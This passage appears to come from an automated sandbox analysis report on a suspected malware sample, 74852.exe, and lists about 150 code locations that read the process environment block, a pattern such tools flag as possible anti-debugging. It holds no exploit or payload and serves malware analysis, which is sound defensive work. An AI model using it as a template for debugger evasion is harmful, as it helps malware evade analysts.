Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h] | 1_2_01497016
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h] | 1_2_01497016
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h] | 1_2_01497016
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h] | 1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h] | 1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h] | 1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h] | 1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144BC2C mov eax, dword ptr fs:[00000030h] | 1_2_0144BC2C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h] | 1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h] | 1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h] | 1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h] | 1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h] | 1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E8CD6 mov eax, dword ptr fs:[00000030h] | 1_2_014E8CD6
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov ecx, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h] | 1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014158EC mov eax, dword ptr fs:[00000030h] | 1_2_014158EC
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D14FB mov eax, dword ptr fs:[00000030h] | 1_2_014D14FB
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h] | 1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h] | 1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h] | 1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01419080 mov eax, dword ptr fs:[00000030h] | 1_2_01419080
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01493884 mov eax, dword ptr fs:[00000030h] | 1_2_01493884
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01493884 mov eax, dword ptr fs:[00000030h] | 1_2_01493884
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142849B mov eax, dword ptr fs:[00000030h] | 1_2_0142849B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h] | 1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014590AF mov eax, dword ptr fs:[00000030h] | 1_2_014590AF
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144F0BF mov ecx, dword ptr fs:[00000030h] | 1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h] | 1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h] | 1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141DB40 mov eax, dword ptr fs:[00000030h] | 1_2_0141DB40
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142EF40 mov eax, dword ptr fs:[00000030h] | 1_2_0142EF40
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E8B58 mov eax, dword ptr fs:[00000030h] | 1_2_014E8B58
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141F358 mov eax, dword ptr fs:[00000030h] | 1_2_0141F358
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141DB60 mov ecx, dword ptr fs:[00000030h] | 1_2_0141DB60
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142FF60 mov eax, dword ptr fs:[00000030h] | 1_2_0142FF60
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E8F6A mov eax, dword ptr fs:[00000030h] | 1_2_014E8F6A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h] | 1_2_01443B7A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h] | 1_2_01443B7A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E070D mov eax, dword ptr fs:[00000030h] | 1_2_014E070D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E070D mov eax, dword ptr fs:[00000030h] | 1_2_014E070D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h] | 1_2_0144A70E
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h] | 1_2_0144A70E
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143F716 mov eax, dword ptr fs:[00000030h] | 1_2_0143F716
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D131B mov eax, dword ptr fs:[00000030h] | 1_2_014D131B
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h] | 1_2_014AFF10
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h] | 1_2_014AFF10
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h] | 1_2_01414F2E
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h] | 1_2_01414F2E
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144E730 mov eax, dword ptr fs:[00000030h] | 1_2_0144E730
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014953CA mov eax, dword ptr fs:[00000030h] | 1_2_014953CA
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014953CA mov eax, dword ptr fs:[00000030h] | 1_2_014953CA
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h] | 1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143DBE9 mov eax, dword ptr fs:[00000030h] | 1_2_0143DBE9
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014537F5 mov eax, dword ptr fs:[00000030h] | 1_2_014537F5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D138A mov eax, dword ptr fs:[00000030h] | 1_2_014D138A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014CD380 mov ecx, dword ptr fs:[00000030h] | 1_2_014CD380
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h] | 1_2_01421B8F
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h] | 1_2_01421B8F
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442397 mov eax, dword ptr fs:[00000030h] | 1_2_01442397
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144B390 mov eax, dword ptr fs:[00000030h] | 1_2_0144B390
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01428794 mov eax, dword ptr fs:[00000030h] | 1_2_01428794
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h] | 1_2_01497794
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h] | 1_2_01497794
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h] | 1_2_01497794
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h] | 1_2_01444BAD
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h] | 1_2_01444BAD
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h] | 1_2_01444BAD
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E5BA5 mov eax, dword ptr fs:[00000030h] | 1_2_014E5BA5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h] | 1_2_01419240
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h] | 1_2_01419240
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h] | 1_2_01419240
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01419240 mov eax, dword ptr fs:[00000030h] | 1_2_01419240
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01427E41 mov eax, dword ptr fs:[00000030h] | 1_2_01427E41
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h] | 1_2_014DAE44
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DAE44 mov eax, dword ptr fs:[00000030h] | 1_2_014DAE44
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014DEA55 mov eax, dword ptr fs:[00000030h] | 1_2_014DEA55
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014A4257 mov eax, dword ptr fs:[00000030h] | 1_2_014A4257
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h] | 1_2_014CB260
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014CB260 mov eax, dword ptr fs:[00000030h] | 1_2_014CB260
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E8A62 mov eax, dword ptr fs:[00000030h] | 1_2_014E8A62
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0142766D mov eax, dword ptr fs:[00000030h] | 1_2_0142766D
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h] | 1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h] | 1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h] | 1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h] | 1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0143AE73 mov eax, dword ptr fs:[00000030h] | 1_2_0143AE73
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0145927A mov eax, dword ptr fs:[00000030h] | 1_2_0145927A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h] | 1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h] | 1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141C600 mov eax, dword ptr fs:[00000030h] | 1_2_0141C600
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01448E00 mov eax, dword ptr fs:[00000030h] | 1_2_01448E00
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014D1608 mov eax, dword ptr fs:[00000030h] | 1_2_014D1608
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01428A0A mov eax, dword ptr fs:[00000030h] | 1_2_01428A0A
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h] | 1_2_01415210
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01415210 mov ecx, dword ptr fs:[00000030h] | 1_2_01415210
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h] | 1_2_01415210
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01415210 mov eax, dword ptr fs:[00000030h] | 1_2_01415210
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h] | 1_2_0141AA16
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141AA16 mov eax, dword ptr fs:[00000030h] | 1_2_0141AA16
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h] | 1_2_0144A61C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144A61C mov eax, dword ptr fs:[00000030h] | 1_2_0144A61C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01433A1C mov eax, dword ptr fs:[00000030h] | 1_2_01433A1C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0141E620 mov eax, dword ptr fs:[00000030h] | 1_2_0141E620
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h] | 1_2_01454A2C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01454A2C mov eax, dword ptr fs:[00000030h] | 1_2_01454A2C
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014CFE3F mov eax, dword ptr fs:[00000030h] | 1_2_014CFE3F
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01458EC7 mov eax, dword ptr fs:[00000030h] | 1_2_01458EC7
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014436CC mov eax, dword ptr fs:[00000030h] | 1_2_014436CC
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014CFEC0 mov eax, dword ptr fs:[00000030h] | 1_2_014CFEC0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442ACB mov eax, dword ptr fs:[00000030h] | 1_2_01442ACB
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014E8ED6 mov eax, dword ptr fs:[00000030h] | 1_2_014E8ED6
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014276E2 mov eax, dword ptr fs:[00000030h] | 1_2_014276E2
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_01442AE4 mov eax, dword ptr fs:[00000030h] | 1_2_01442AE4
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014416E0 mov ecx, dword ptr fs:[00000030h] | 1_2_014416E0
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014AFE87 mov eax, dword ptr fs:[00000030h] | 1_2_014AFE87
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h] | 1_2_0144D294
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_0144D294 mov eax, dword ptr fs:[00000030h] | 1_2_0144D294
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h] | 1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h] | 1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h] | 1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h] | 1_2_014152A5
Source: C:\Users\user\Desktop\74852.exe | Code function: 1_2_014152A5 mov eax, dword ptr fs:[00000030h]